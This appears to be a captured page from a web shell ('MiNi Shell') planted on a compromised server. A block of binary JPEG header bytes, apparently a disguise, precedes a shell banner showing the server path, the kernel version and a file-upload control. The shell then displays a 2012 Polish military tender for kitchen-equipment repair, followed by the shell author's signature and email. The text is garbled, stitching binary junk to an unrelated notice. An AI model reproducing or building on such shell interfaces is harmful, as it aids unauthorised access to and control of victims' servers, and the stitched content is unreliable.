JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120704/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120704/145821-N-2012.html

<p class="kh_header"><b>Giżycko: NAPRAWA I KONSERWACJA SPRZĘTU KUCHENNO - GASTRONOMICZNEGO NA RZECZ 
JEDNOSTKI WOJSKOWEJ NR 4352 GIŻYCKO Z PODZIAŁEM NA TRZY CZĘŚCI. 
CZĘŚĆ 1 - NAPRAWA I KONSERWACJA SPRZĘTU KUCHENNO-GASTRONOMICZNEGO W M. KRUKLANKI, GIŻYCKO, GOŁDAP.
CZĘŚĆ 2 - NAPRAWA I KONSERWACJA SPRZĘTU KUCHENNO-GASTRONOMICZNEGO W M. BEMOWO PISKIE, ORZYSZ.
CZĘŚĆ 3 - NAPRAWA I KONSERWACJA SPRZĘTU KUCHENNO-GASTRONOMICZNEGO W M. GOŁDAP.</b><br>
<b>Numer ogłoszenia: 145821 - 2012; data zamieszczenia: 04.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 4352 , ul. Nowowiejska 20, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 87 429 46 02, faks 87 429 46 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.24wog.wp.mil.pl, www.bip.mon.gov.pl, www.army.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Obrona.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> NAPRAWA I KONSERWACJA SPRZĘTU KUCHENNO - GASTRONOMICZNEGO NA RZECZ 
JEDNOSTKI WOJSKOWEJ NR 4352 GIŻYCKO Z PODZIAŁEM NA TRZY CZĘŚCI. 
CZĘŚĆ 1 - NAPRAWA I KONSERWACJA SPRZĘTU KUCHENNO-GASTRONOMICZNEGO W M. KRUKLANKI, GIŻYCKO, GOŁDAP.
CZĘŚĆ 2 - NAPRAWA I KONSERWACJA SPRZĘTU KUCHENNO-GASTRONOMICZNEGO W M. BEMOWO PISKIE, ORZYSZ.
CZĘŚĆ 3 - NAPRAWA I KONSERWACJA SPRZĘTU KUCHENNO-GASTRONOMICZNEGO W M. GOŁDAP..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są usługi - remontowe i konserwacyjne sprzętu kuchenno - gastronomicznego, znajdującego się na wyposażeniu poszczególnych jednostek, zgodnie z podziałem zamówienia na poszczególne części. Zamawiający dzieli niniejsze zamówienie na trzy części. Wykonawca może złożyć ofertę na wybrana przez siebie część - na jedną, dwie bądź trzy części.
Część 1 - naprawa i konserwacja sprzętu kuchenno-gastronomicznego w m. Kruklanki, Giżycko, Gołdap w szacunkowej łącznej ilości 545 roboczogodzin rozłożonych na 
obiekt koszarowy na terenie Jednostki Wojskowej Nr 3797 ul. Wojska Polskiego 21, 11 - 500 Giżycko.
obiekt koszarowy na terenie Jednostki Wojskowej Nr 3797 ul. Nowowiejska 20, 11 - 500 Giżycko.
obiekt koszarowy na terenie Jednostki Wojskowej Nr 3797 ul. 1 Maja 14,11 - 500 Giżycko.
obiekt koszarowy na terenie Jednostki Wojskowej Nr 2568 ul. gen. J. Bema 7, 11 -600 Węgorzewo.
obiekt koszarowy na terenie Jednostki Wojskowej Nr 2031 Kruklanki, 11 - 601 Kruklanki.
obiekt koszarowy ul. Moniuszki 6, 11 - 500 Giżycko.
Część 2 - naprawa i konserwacja sprzętu kuchenno-gastronomicznego w m. Bemowo Piskie, Orzysz w szacunkowej łącznej ilości 388 roboczogodzin rozłożonych na
obiekt koszarowy na terenie Jednostki Wojskowej Nr 2098 w Bemowie Piskim ul. Kętrzyńskiego 1, 12-230 Biała Piska. 
Przedszkole Nr 145 w Bemowie Piskim, ul. Przedszkolaków 193, 12-230 Biała Piska.
obiekt koszarowy na terenie Jednostki Wojskowej Nr 1460 ul. Wojska Polskiego 23, 12 - 250 Orzysz.
Część 3 - naprawa i konserwacja sprzętu kuchenno-gastronomicznego w m. Gołdap w szacunkowej łącznej ilości 115 roboczogodzin obejmujących
obiekt koszarowy na terenie Jednostki Wojskowej Nr 4808 ul. Partyzantów 33, 
19 -500 Gołdap.
UWAGA: PODANE ILOŚCI ROBOCZOGODZIN SĄ JEDYNIE ILOŚCIAMI SZACUNKOWYMI. SZACUJĄC ILOŚĆ ROBOCZOGODZIN ZAMAWIAJĄCY UWZGLĘDNIŁ ZARÓWNO PRZEGLĄD JAK I NAPRAWĘ WRAZ Z EWENTUALNYM KOSZTEM CZĘŚCI ZAMIENNYCH, WYCIĄGAJĄC ŚREDNIĄ, TAK BY ORIENTACYJNIE WSKAZAĆ SKALĘ WIELKOŚCI ZAMÓWIENIA.
2.Informacyjny wykaz sprzętu podlegającego przeglądom konserwacyjnym zawiera  Załącznik nr 3 do SIWZ. Zamawiający informuje iż ilość sprzętu może ulec zmianie w ciągu roku. 
3. Sprzęt podlegający przeglądom konserwacyjnym i remontom można obejrzeć w miejscu ich zamontowania po uprzednim uzgodnieniu z osobami merytorycznie odpowiedzialnymi za realizację zamówienia. 
4. Wykaz czynności oraz normy czasowe zawarto w normatywie czasowym - Załączniki nr  1 i 2 do SIWZ - przeglądy konserwacyjne wykonywane raz w kwartale, awaryjne naprawy bieżące oraz główne sprzętu będącego w użytkowaniu.  W przypadku naprawy sprzętu będącego na ewidencji JW 4352 nie ujętego w Normatywie czasowym napraw i remontów sprzętu gastronomicznego i chłodniczego, podstawę do wykonania usługi stanowić będzie pisemne zamówienia Zamawiającego określające zakres i przedmiot wykonania usługi. Każdorazowo przed wykonaniem przeglądu konserwacyjnego Zamawiający określi egzemplarze sprzętu, które będą jemu podlegać.
5. Wykonawca musi posiadać świadectwo kwalifikacji uprawniające do działalności polegającej na  obsłudze technicznej, demontażu oraz naprawie urządzeń i instalacji zawierających substancje kontrolowane, a także na odzysku substancji kontrolowanych, ich recyklingu, regeneracji, przekazywaniu do ponownego użytkowania oraz obrocie nimi. Podstawa- Ustawa z dnia 20 
kwietnia 2004r o substancjach zubożających warstwę ozonową.
6.Sprzęt będący w okresie gwarancji podlega tylko przeglądowi konserwacyjnemu.
7.Wykonawca  podejmie naprawę urządzeń chłodniczych wskazanych przez Zamawiającego po zgłoszeniu awarii w ciągu 24 godzin od chwili przyjęcia zgłoszenia dotyczy także dni świątecznych, wolnych od pracy oraz w ciągu 48 godzin od chwili przyjęcia zgłoszenia dla pozostałego sprzętu i urządzeń.
8.W przypadku nie wywiązania się z zobowiązania określonego w ust. 4 Wykonawca pokryje koszty związane z naprawą sprzętu i urządzeń w miejscu naprawy wskazanym przez Zamawiającego.
9.Wykonawca do wykonywania napraw i remontów sprzętu będzie używał części nowych, nie poddawanych regeneracji, o jakości technicznej, co najmniej takiej samej jak zamontowane oryginalnie.
10.Każdorazowo po dokonaniu naprawy, konserwacji lub przeglądu stanu technicznego, Wykonawca wystawi fakturę załączając do niej załącznik-kosztorys, specyfikację lub kartę usługi w którym wyszczególni zakres czynności oraz użyte części zamienne i materiały do naprawy i konserwacji. 
Do każdej pozycji w kosztorysie wykonanej usługi przypisana zostanie strona, tabela oraz nr czynności wg normatywu czasowego napraw i remontów sprzętu gastronomicznego lub chłodniczego określającego ilość roboczogodzin na wykonywaną czynność wg Załącznika nr 1 i 2.
11.W przypadku zastosowania materiału i części będącej w zasobach magazynowych Wykonawcy zużytej do wykonania usługi, Wykonawca przedstawi w formie załącznika kserokopię arkusza z ceną rozliczeniową magazynu Wykonawcy.
12.Zamawiający zastrzega sobie prawo do sprawdzenia wartości tych materiałów i części na rynku krajowym ograniczając się do cen producenta lub cen hurtowni znajdujących się w rejonie województwa siedziby Zamawiającego lub Wykonawcy.
13.Usterki sprzętu i urządzeń Służby Żywnościowej wymagające nieskomplikowanych drobnych napraw, usuwane będą w miejscu ich użytkowania , natomiast wymagające specjalistycznych napraw przewożone będą do naprawy w warsztacie Wykonawcy.
14.Wykonawca zobowiązuje się do naprawy sprzętu w przeciągu 7 dni roboczych.
15. W przypadkach szczególnych na prośbę Wykonawcy Zamawiający może przedłużyć termin naprawy o kolejne 7 dni. 
16. Koszty dojazdu oraz transportu sprzętu i urządzeń od i do Zamawiającego, ponosi Wykonawca we własnym zakresie.
17. Na żądanie Zamawiającego, najpóźniej w dniu zawarcia umowy, Wykonawca przedłoży świadectwo kwalifikacji uprawniające do działalności polegającej na obsłudze technicznej, demontażu oraz naprawie urządzeń  i instalacji zawierających substancje kontrolowane, a także na odzysku substancji kontrolowanych, ich recyklingu, regeneracji, przekazywaniu do ponownego użytkowania oraz obrocie nimi (zgodnie z Ustawą z dnia 20 kwietnia 2004 r. o substancjach zubożających warstwę ozonową). Niezłożenie świadectwa kwalifikacji na wezwanie Zamawiającego, oznaczać będzie rezygnację Wykonawcy z zawarcia umowy z Zamawiającym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.73.00.00-1, 50.80.00.00-3, 50.88.30.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania uprawnień do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania wiedzy i doświadczenia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu dysponowania potencjałem technicznym, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu dysponowania osobami zdolnymi do wykonania zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej zrealizowanie zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie dla osób fizycznych, stanowiące załącznik nr 6 do SIWZ
2. Formularz ofertowy ­wypełniony i podpisany wg wzoru Zamawiającego, stanowiący załącznik nr 8 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Wielkość narzutu (w procentach) ceny zakupionych części lub ceny rozliczeniowej części w magazynie Wykonawcy - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.24wog.wp.mil.pl, www.army.mil.pl, www.bip.mon.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa nr 4352 w Giżycku, ul. Nowowiejska 20, budynek Sztabu, pokój nr 6..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2012 godzina 09:00, miejsce: Jednostka Wojskowa nr 4352 w Giżycku, ul. Nowowiejska 20, budynek Sztabu, Kancelaria Jawna - pokój nr 109..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> NAPRAWA I KONSERWACJA SPRZĘTU KUCHENNO-GASTRONOMICZNEGO W M. KRUKLANKI, GIŻYCKO, GOŁDAP..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1 - naprawa i konserwacja sprzętu kuchenno-gastronomicznego w m. Kruklanki, Giżycko, Gołdap w szacunkowej łącznej ilości 545 roboczogodzin rozłożonych na  
1) obiekt koszarowy na terenie Jednostki Wojskowej Nr 3797 ul. Wojska Polskiego 21, 11 - 500 Giżycko.
2) obiekt koszarowy na terenie Jednostki Wojskowej Nr 3797 ul. Nowowiejska 20, 11 - 500 Giżycko.
3) obiekt koszarowy na terenie Jednostki Wojskowej Nr 3797 ul. 1 Maja 14,11 - 500 Giżycko.
4) obiekt koszarowy na terenie Jednostki Wojskowej Nr 2568 ul. gen. J. Bema 7, 11 -600 Węgorzewo.
5) obiekt koszarowy na terenie Jednostki Wojskowej Nr 2031 Kruklanki, 11 - 601 Kruklanki.
6) obiekt koszarowy ul. Moniuszki 6, 11 - 500 Giżycko..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.73.00.00-1, 50.80.00.00-3, 50.88.30.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Wielkość narzutu (w procentach) ceny zakupionych części lub ceny rozliczeniowej części w magazynie Wykonawcy - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ 2 - NAPRAWA I KONSERWACJA SPRZĘTU KUCHENNO-GASTRONOMICZNEGO W M. BEMOWO PISKIE, ORZYSZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 - naprawa i konserwacja sprzętu kuchenno-gastronomicznego w m. Bemowo Piskie, Orzysz w szacunkowej łącznej ilości 388 roboczogodzin rozłożonych na
1) obiekt koszarowy na terenie Jednostki Wojskowej Nr 2098 w Bemowie Piskim ul. Kętrzyńskiego 1, 12-230 Biała Piska. 
2) Przedszkole Nr 145 w Bemowie Piskim, ul. Przedszkolaków 193, 12-230 Biała Piska.
3) obiekt koszarowy na terenie Jednostki Wojskowej Nr 1460 ul. Wojska Polskiego 23, 12 - 250 Orzysz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.73.00.00-1, 50.80.00.00-3, 50.88.30.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Wielkość narzutu (w procentach) ceny zakupionych części lub ceny rozliczeniowej części w magazynie Wykonawcy - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ 3 - NAPRAWA I KONSERWACJA SPRZĘTU KUCHENNO-GASTRONOMICZNEGO W M. GOŁDAP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 3 - naprawa i konserwacja sprzętu kuchenno-gastronomicznego w m. Gołdap w szacunkowej łącznej ilości 115 roboczogodzin obejmujących:
1) obiekt koszarowy na terenie Jednostki Wojskowej Nr 4808 ul. Partyzantów 33, 
19 -500 Gołdap..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.73.00.00-1, 50.80.00.00-3, 50.88.30.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Wielkość narzutu (w procentach) ceny zakupionych części lub ceny rozliczeniowej części w magazynie Wykonawcy - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com